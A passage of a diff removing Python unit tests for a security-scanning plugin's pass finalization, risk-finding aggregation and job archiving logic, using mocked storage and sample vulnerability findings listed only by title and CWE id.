MagicMock(return_value={"worker-A": report_a, "worker-B": report_b}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, - "completed_tests": ["port_scan"], "ports_scanned": 1024, - "nr_open_ports": 2, "port_protocols": {"80": "http", "443": "https"}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # _collect_node_reports called exactly once - plugin._collect_node_reports.assert_called_once() - - def test_pass_report_cid_in_r1fs(self): - """PassReport stored in R1FS with correct fields.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin() - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {"findings_score": 5}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # r1fs.add_json called twice: once for aggregated data, once for PassReport - self.assertEqual(plugin.r1fs.add_json.call_count, 2) - - # Second call is the PassReport - pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] - self.assertEqual(pass_report_dict["pass_nr"], 1) - self.assertIn("aggregated_report_cid", pass_report_dict) - self.assertIn("worker_reports", pass_report_dict) - self.assertEqual(pass_report_dict["risk_score"], 10) - self.assertIn("risk_breakdown", pass_report_dict) - self.assertIn("date_started", pass_report_dict) - self.assertIn("date_completed", pass_report_dict) - - def test_aggregated_report_separate_cid(self): - """aggregated_report_cid is a separate R1FS write from the PassReport.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: "QmPassCID"}) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # First R1FS write = aggregated data, second = PassReport - agg_dict = plugin.r1fs.add_json.call_args_list[0][0][0] - pass_dict = plugin.r1fs.add_json.call_args_list[1][0][0] - - # The PassReport references the aggregated CID - self.assertEqual(pass_dict["aggregated_report_cid"], "QmAggCID") - - # Aggregated data should have open_ports (from AggregatedScanData) - self.assertIn("open_ports", agg_dict) - - def test_finding_id_deterministic(self): - """Same input produces same finding_id; different title produces different id.""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - "service_info": { - "80": { - "_service_info_http": { - "findings": [ - {"title": "SQL Injection", "severity": "HIGH", "cwe_id": "CWE-89", "confidence": "firm"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - risk1, findings1 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - risk2, findings2 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - - self.assertEqual(findings1[0]["finding_id"], findings2[0]["finding_id"]) - - # Different title → different finding_id - aggregated2 = { - "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - "service_info": { - "80": { - "_service_info_http": { - "findings": [ - {"title": "XSS Vulnerability", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "firm"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - _, findings3 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated2) - self.assertNotEqual(findings1[0]["finding_id"], findings3[0]["finding_id"]) - - def test_finding_id_cwe_collision(self): - """Same CWE, different title, same port+probe → different finding_ids.""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - "service_info": { - "80": { - "_web_test_xss": { - "findings": [ - {"title": "Reflected XSS in search", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, - {"title": "Stored XSS in comment", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - self.assertEqual(len(findings), 2) - self.assertNotEqual(findings[0]["finding_id"], findings[1]["finding_id"]) - - def test_finding_enrichment_fields(self): - """Each finding has finding_id, port, protocol, probe, category.""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [443], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"443": "https"}, - "service_info": { - "443": { - "_service_info_ssl": { - "findings": [ - {"title": "Weak TLS", "severity": "MEDIUM", "cwe_id": "CWE-326", "confidence": "certain"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - self.assertEqual(len(findings), 1) - f = findings[0] - self.assertIn("finding_id", f) - self.assertEqual(len(f["finding_id"]), 16) # 16-char hex - self.assertEqual(f["port"], 443) - self.assertEqual(f["protocol"], "https") - self.assertEqual(f["probe"], "_service_info_ssl") - self.assertEqual(f["category"], "service") - - def test_port_protocols_none(self): - """port_protocols is None → protocol defaults to 'unknown' (no crash).""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [22], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": None, - "service_info": { - "22": { - "_service_info_ssh": { - "findings": [ - {"title": "Weak SSH key", "severity": "LOW", "cwe_id": "CWE-320", "confidence": "firm"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - self.assertEqual(len(findings), 1) - self.assertEqual(findings[0]["protocol"], "unknown") - - def test_llm_success_no_llm_failed(self): - """LLM succeeds → llm_failed absent from serialized PassReport.""" - from extensions.business.cybersec.red_mesh.models import PassReport - - pr = PassReport( - pass_nr=1, date_started=1000.0, date_completed=1100.0, duration=100.0, - aggregated_report_cid="QmAgg", - worker_reports={}, - risk_score=50, - llm_analysis="# Analysis\nAll good.", - quick_summary="No critical issues found.", - llm_failed=None, # success - ) - d = pr.to_dict() - self.assertNotIn("llm_failed", d) - self.assertEqual(d["llm_analysis"], "# Analysis\nAll good.") - - def test_llm_failure_flag_and_timeline(self): - """LLM fails → llm_failed: True, timeline event added.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin(llm_enabled=True) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - # LLM returns None (failure) - plugin._run_aggregated_llm_analysis = MagicMock(return_value=None) - plugin._run_quick_summary_analysis = MagicMock(return_value=None) - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # Check PassReport has llm_failed=True - pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] - self.assertTrue(pass_report_dict.get("llm_failed")) - - # Check timeline event was emitted for llm_failed - llm_failed_calls = [ - c for c in plugin._emit_timeline_event.call_args_list - if c[0][1] == "llm_failed" - ] - self.assertEqual(len(llm_failed_calls), 1) - # _emit_timeline_event(job_specs, "llm_failed", label, meta={"pass_nr": ...}) - call_kwargs = llm_failed_calls[0][1] # keyword args - meta = call_kwargs.get("meta", {}) - self.assertIn("pass_nr", meta) - - def test_aggregated_report_write_failure(self): - """R1FS fails for aggregated → pass finalization skipped, no partial state.""" - PentesterApi01Plugin = self._get_plugin_class() - # First R1FS write (aggregated) returns None = failure - plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: None, 2: "QmPassCID"}) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # CStore should NOT have pass_reports appended - self.assertEqual(len(job_specs["pass_reports"]), 0) - # CStore hset was called for intermediate status updates (COLLECTING, ANALYZING, FINALIZING) - # but NOT for finalization — verify job_status is NOT FINALIZED in the last write - for call_args in plugin.chainstore_hset.call_args_list: - value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None - if isinstance(value, dict): - self.assertNotEqual(value.get("job_status"), "FINALIZED") - - def test_pass_report_write_failure(self): - """R1FS fails for pass report → CStore pass_reports not appended.""" - PentesterApi01Plugin = self._get_plugin_class() - # First R1FS write (aggregated) succeeds, second (pass report) fails - plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: None}) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # CStore should NOT have pass_reports appended - self.assertEqual(len(job_specs["pass_reports"]), 0) - # CStore hset was called for status updates but NOT for finalization - for call_args in plugin.chainstore_hset.call_args_list: - value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None - if isinstance(value, dict): - self.assertNotEqual(value.get("job_status"), "FINALIZED") - - def test_cstore_risk_score_updated(self): - """After pass, risk_score on CStore matches pass result.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin() - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 42, "breakdown": {"findings_score": 30}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # CStore risk_score updated - self.assertEqual(job_specs["risk_score"], 42) - - # PassReportRef in pass_reports has same risk_score - self.assertEqual(len(job_specs["pass_reports"]), 1) - ref = job_specs["pass_reports"][0] - self.assertEqual(ref["risk_score"], 42) - self.assertIn("report_cid", ref) - self.assertEqual(ref["pass_nr"], 1) - - -class TestPhase4UiAggregate(unittest.TestCase): - """Phase 4: UI Aggregate Computation.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _make_plugin(self): - plugin = MagicMock() - Plugin = self._get_plugin_class() - plugin._count_services = lambda si: Plugin._count_services(plugin, si) - plugin._compute_ui_aggregate = lambda passes, agg: Plugin._compute_ui_aggregate(plugin, passes, agg) - plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER - plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER - return plugin, Plugin - - def _make_finding(self, severity="HIGH", confidence="firm", finding_id="abc123", title="Test"): - return {"finding_id": finding_id, "severity": severity, "confidence": confidence, "title": title} - - def _make_pass(self, pass_nr=1, findings=None, risk_score=0, worker_reports=None): - return { - "pass_nr": pass_nr, - "risk_score": risk_score, - "risk_breakdown": {"findings_score": 10}, - "quick_summary": "Summary text", - "findings": findings, - "worker_reports": worker_reports or { - "w1": {"start_port": 1, "end_port": 512, "open_ports": [80]}, - }, - } - - def _make_aggregated(self, open_ports=None, service_info=None): - return { - "open_ports": open_ports or [80, 443], - "service_info": service_info or { - "80": {"_service_info_http": {"findings": []}}, - "443": {"_service_info_https": {"findings": []}}, - }, - } - - def test_findings_count_uppercase_keys(self): - """findings_count keys are UPPERCASE.""" - plugin, _ = self._make_plugin() - findings = [ - self._make_finding(severity="CRITICAL", finding_id="f1"), - self._make_finding(severity="HIGH", finding_id="f2"), - self._make_finding(severity="HIGH", finding_id="f3"), - self._make_finding(severity="MEDIUM", finding_id="f4"), - ] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - fc = result.to_dict()["findings_count"] - self.assertEqual(fc["CRITICAL"], 1) - self.assertEqual(fc["HIGH"], 2) - self.assertEqual(fc["MEDIUM"], 1) - for key in fc: - self.assertEqual(key, key.upper()) - - def test_top_findings_max_10(self): - """More than 10 CRITICAL+HIGH -> capped at 10.""" - plugin, _ = self._make_plugin() - findings = [self._make_finding(severity="CRITICAL", finding_id=f"f{i}") for i in range(15)] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - self.assertEqual(len(result.to_dict()["top_findings"]), 10) - - def test_top_findings_sorted(self): - """CRITICAL before HIGH, within same severity sorted by confidence.""" - plugin, _ = self._make_plugin() - findings = [ - self._make_finding(severity="HIGH", confidence="certain", finding_id="f1", title="H-certain"), - self._make_finding(severity="CRITICAL", confidence="tentative", finding_id="f2", title="C-tentative"), - self._make_finding(severity="HIGH", confidence="tentative", finding_id="f3", title="H-tentative"), - self._make_finding(severity="CRITICAL", confidence="certain", finding_id="f4", title="C-certain"), - ] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - top = result.to_dict()["top_findings"] - self.assertEqual(top[0]["title"], "C-certain") - self.assertEqual(top[1]["title"], "C-tentative") - self.assertEqual(top[2]["title"], "H-certain") - self.assertEqual(top[3]["title"], "H-tentative") - - def test_top_findings_excludes_medium(self): - """MEDIUM/LOW/INFO findings never in top_findings.""" - plugin, _ = self._make_plugin() - findings = [ - self._make_finding(severity="MEDIUM", finding_id="f1"), - self._make_finding(severity="LOW", finding_id="f2"), - self._make_finding(severity="INFO", finding_id="f3"), - ] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - d = result.to_dict() - self.assertNotIn("top_findings", d) # stripped by _strip_none (None) - - def test_finding_timeline_single_pass(self): - """1 pass -> finding_timeline is None (stripped).""" - plugin, _ = self._make_plugin() - p = self._make_pass(findings=[]) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - d = result.to_dict() - self.assertNotIn("finding_timeline", d) # None → stripped - - def test_finding_timeline_multi_pass(self): - """3 passes with overlapping findings -> correct first_seen, last_seen, pass_count.""" - plugin, _ = self._make_plugin() - f_persistent = self._make_finding(finding_id="persist1") - f_transient = self._make_finding(finding_id="transient1") - f_new = self._make_finding(finding_id="new1") - passes = [ - self._make_pass(pass_nr=1, findings=[f_persistent, f_transient]), - self._make_pass(pass_nr=2, findings=[f_persistent]), - self._make_pass(pass_nr=3, findings=[f_persistent, f_new]), - ] - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate(passes, agg) - ft = result.to_dict()["finding_timeline"] - self.assertEqual(ft["persist1"]["first_seen"], 1) - self.assertEqual(ft["persist1"]["last_seen"], 3) - self.assertEqual(ft["persist1"]["pass_count"], 3) - self.assertEqual(ft["transient1"]["first_seen"], 1) - self.assertEqual(ft["transient1"]["last_seen"], 1) - self.assertEqual(ft["transient1"]["pass_count"], 1) - self.assertEqual(ft["new1"]["first_seen"], 3) - self.assertEqual(ft["new1"]["last_seen"], 3) - self.assertEqual(ft["new1"]["pass_count"], 1) - - def test_zero_findings(self): - """findings_count is {}, top_findings is [], total_findings is 0.""" - plugin, _ = self._make_plugin() - p = self._make_pass(findings=[]) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - d = result.to_dict() - self.assertEqual(d["total_findings"], 0) - # findings_count and top_findings are None (stripped) when empty - self.assertNotIn("findings_count", d) - self.assertNotIn("top_findings", d) - - def test_open_ports_sorted_unique(self): - """total_open_ports is deduped and sorted.""" - plugin, _ = self._make_plugin() - p = self._make_pass(findings=[]) - agg = self._make_aggregated(open_ports=[443, 80, 443, 22, 80]) - result = plugin._compute_ui_aggregate([p], agg) - self.assertEqual(result.to_dict()["total_open_ports"], [22, 80, 443]) - - def test_count_services(self): - """_count_services counts ports with at least one detected service.""" - plugin, _ = self._make_plugin() - service_info = { - "80": {"_service_info_http": {}, "_web_test_xss": {}}, - "443": {"_service_info_https": {}, "_service_info_http": {}}, - } - self.assertEqual(plugin._count_services(service_info), 2) - self.assertEqual(plugin._count_services({}), 0) - self.assertEqual(plugin._count_services(None), 0) - - -class TestPhase3Archive(unittest.TestCase): - """Phase 3: Job Close & Archive.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _build_archive_plugin(self, job_id="test-job", pass_count=1, run_mode="SINGLEPASS", - job_status="FINALIZED", r1fs_write_fail=False, r1fs_verify_fail=False): - """Build a mock plugin pre-configured for _build_job_archive testing.""" - plugin = MagicMock() - plugin.ee_addr = "launcher-node" - plugin.ee_id = "launcher-alias" - plugin.cfg_instance_id = "test-instance" - plugin.time.return_value = 1000200.0 - plugin.json_dumps.return_value = "{}" - - # R1FS mock - plugin.r1fs = MagicMock() - - # Build pass report dicts and refs - pass_reports_data = [] - pass_report_refs = [] - for i in range(1, pass_count + 1): - pr = { - "pass_nr": i, - "date_started": 1000000.0 + (i - 1) * 100, - "date_completed": 1000000.0 + i * 100, - "duration": 100.0, - "aggregated_report_cid": f"QmAgg{i}", - "worker_reports": { - "worker-A": {"report_cid": f"QmWorker{i}A", "start_port": 1, "end_port": 512, "ports_scanned": 512, "open_ports": [80], "nr_findings": 2}, - }, - "risk_score": 25 + i, - "risk_breakdown": {"findings_score": 10}, - "findings": [ - {"finding_id": f"f{i}a", "severity": "HIGH", "confidence": "firm", "title": f"Finding {i}A"}, - {"finding_id": f"f{i}b", "severity": "MEDIUM", "confidence": "firm", "title": f"Finding {i}B"}, - ], - "quick_summary": f"Summary for pass {i}", - } - pass_reports_data.append(pr) - pass_report_refs.append({"pass_nr": i, "report_cid": f"QmPassReport{i}", "risk_score": 25 + i}) - - # Job config - job_config = { - "target": "example.com", "start_port": 1, "end_port": 1024, - "run_mode": run_mode, "enabled_features": [], - } - - # Latest aggregated data - latest_aggregated = { - "open_ports": [80, 443], "service_info": {"80": {"_service_info_http": {}}}, - "web_tests_info": {}, "completed_tests": ["port_scan"], "ports_scanned": 1024, - } - - # R1FS get_json: return the right data for each CID - cid_map = {"QmConfigCID": job_config} - for i, pr in enumerate(pass_reports_data): - cid_map[f"QmPassReport{i+1}"] = pr - cid_map[f"QmAgg{i+1}"] = latest_aggregated - - if r1fs_write_fail: - plugin.r1fs.add_json.return_value = None - else: - archive_cid = "QmArchiveCID" - plugin.r1fs.add_json.return_value = archive_cid - if r1fs_verify_fail: - # add_json succeeds but get_json for the archive CID returns None - orig_map = dict(cid_map) - def verify_fail_get(cid): - if cid == archive_cid: - return None - return orig_map.get(cid) - plugin.r1fs.get_json.side_effect = verify_fail_get - else: - # Verification succeeds — archive CID also returns data - cid_map[archive_cid] = {"job_id": job_id} # minimal archive for verification - plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) - - if not r1fs_write_fail and not r1fs_verify_fail: - plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) - - # Job specs (running state) - job_specs = { - "job_id": job_id, - "job_status": job_status, - "job_pass": pass_count, - "run_mode": run_mode, - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "target": "example.com", - "task_name": "Test", - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "risk_score": 25 + pass_count, - "job_config_cid": "QmConfigCID", - "workers": { - "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, - }, - "timeline": [ - {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}, - ], - "pass_reports": pass_report_refs, - } - - plugin.chainstore_hset = MagicMock() - - # Bind real methods for archive building - Plugin = self._get_plugin_class() - plugin._compute_ui_aggregate = lambda passes, agg: Plugin._compute_ui_aggregate(plugin, passes, agg) - plugin._count_services = lambda si: Plugin._count_services(plugin, si) - plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER - plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER - - return plugin, job_specs, pass_reports_data, job_config - - def test_archive_written_to_r1fs(self): - """Archive stored in R1FS with job_id, job_config, passes, ui_aggregate.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, job_config = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # r1fs.add_json called with archive dict - self.assertTrue(plugin.r1fs.add_json.called) - archive_dict = plugin.r1fs.add_json.call_args[0][0] - self.assertEqual(archive_dict["job_id"], "test-job") - self.assertEqual(archive_dict["job_config"]["target"], "example.com") - self.assertEqual(len(archive_dict["passes"]), 1) - self.assertIn("ui_aggregate", archive_dict) - self.assertIn("total_open_ports", archive_dict["ui_aggregate"]) - - def test_archive_duration_computed(self): - """duration == date_completed - date_created, not 0.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - archive_dict = plugin.r1fs.add_json.call_args[0][0] - # date_created=1000000, time()=1000200 → duration=200 - self.assertEqual(archive_dict["duration"], 200.0) - self.assertGreater(archive_dict["duration"], 0) - - def test_stub_has_job_cid_and_config_cid(self): - """After prune, CStore stub has job_cid and job_config_cid.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # Extract the stub written to CStore - hset_call = plugin.chainstore_hset.call_args - stub = hset_call[1]["value"] - self.assertEqual(stub["job_cid"], "QmArchiveCID") - self.assertEqual(stub["job_config_cid"], "QmConfigCID") - - def test_stub_fields_match_model(self): - """Stub has exactly CStoreJobFinalized fields.""" - from extensions.business.cybersec.red_mesh.models import CStoreJobFinalized - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - stub = plugin.chainstore_hset.call_args[1]["value"] - # Verify it can be loaded into CStoreJobFinalized - finalized = CStoreJobFinalized.from_dict(stub) - self.assertEqual(finalized.job_id, "test-job") - self.assertEqual(finalized.job_status, "FINALIZED") - self.assertEqual(finalized.target, "example.com") - self.assertEqual(finalized.pass_count, 1) - self.assertEqual(finalized.worker_count, 1) - self.assertEqual(finalized.start_port, 1) - self.assertEqual(finalized.end_port, 1024) - self.assertGreater(finalized.duration, 0) - - def test_pass_report_cids_cleaned_up(self): - """After archive, individual pass CIDs deleted from R1FS.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # Check delete_file was called for pass report CID - delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] - self.assertIn("QmPassReport1", delete_calls) - - def test_node_report_cids_preserved(self): - """Worker report CIDs NOT deleted.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] - self.assertNotIn("QmWorker1A", delete_calls) - - def test_aggregated_report_cids_preserved(self): - """aggregated_report_cid per pass NOT deleted.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] - self.assertNotIn("QmAgg1", delete_calls) - - def test_archive_write_failure_no_prune(self): - """R1FS write fails -> CStore untouched, full running state retained.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_write_fail=True) - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # CStore should NOT have been pruned - plugin.chainstore_hset.assert_not_called() - # pass_reports still present in job_specs - self.assertEqual(len(job_specs["pass_reports"]), 1) - - def test_archive_verify_failure_no_prune(self): - """CID not retrievable -> CStore untouched.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_verify_fail=True) - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - plugin.chainstore_hset.assert_not_called() - - def test_stuck_recovery(self): - """FINALIZED without job_cid -> _build_job_archive retried via _maybe_finalize_pass.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(job_status="FINALIZED") - # Simulate stuck state: FINALIZED but no job_cid - job_specs["job_status"] = "FINALIZED" - # No job_cid in specs - - plugin.chainstore_hgetall.return_value = {"test-job": job_specs} - plugin._normalize_job_record = MagicMock(return_value=("test-job", job_specs)) - plugin._build_job_archive = MagicMock() - - Plugin._maybe_finalize_pass(plugin) - - plugin._build_job_archive.assert_called_once_with("test-job", job_specs) - - def test_idempotent_rebuild(self): - """Calling _build_job_archive twice doesn't corrupt state.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - first_stub = plugin.chainstore_hset.call_args[1]["value"] - - # Reset and call again (simulating a retry where data is still available) - plugin.chainstore_hset.reset_mock() - plugin.r1fs.add_json.reset_mock() - new_archive_cid = "QmArchiveCID2" - plugin.r1fs.add_json.return_value = new_archive_cid - - # Update get_json to also return data for the new archive CID - orig_side_effect = plugin.r1fs.get_json.side_effect - def extended_get(cid): - if cid == new_archive_cid: - return {"job_id": "test-job"} - return orig_side_effect(cid) - plugin.r1fs.get_json.side_effect = extended_get - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - second_stub = plugin.chainstore_hset.call_args[1]["value"] - # Both produce valid stubs - self.assertEqual(first_stub["job_id"], second_stub["job_id"]) - self.assertEqual(first_stub["pass_count"], second_stub["pass_count"]) - - def test_multipass_archive(self): - """Archive with 3 passes contains all pass data.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(pass_count=3, run_mode="CONTINUOUS_MONITORING", job_status="STOPPED") - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - archive_dict = plugin.r1fs.add_json.call_args[0][0] - self.assertEqual(len(archive_dict["passes"]), 3) - self.assertEqual(archive_dict["passes"][0]["pass_nr"], 1) - 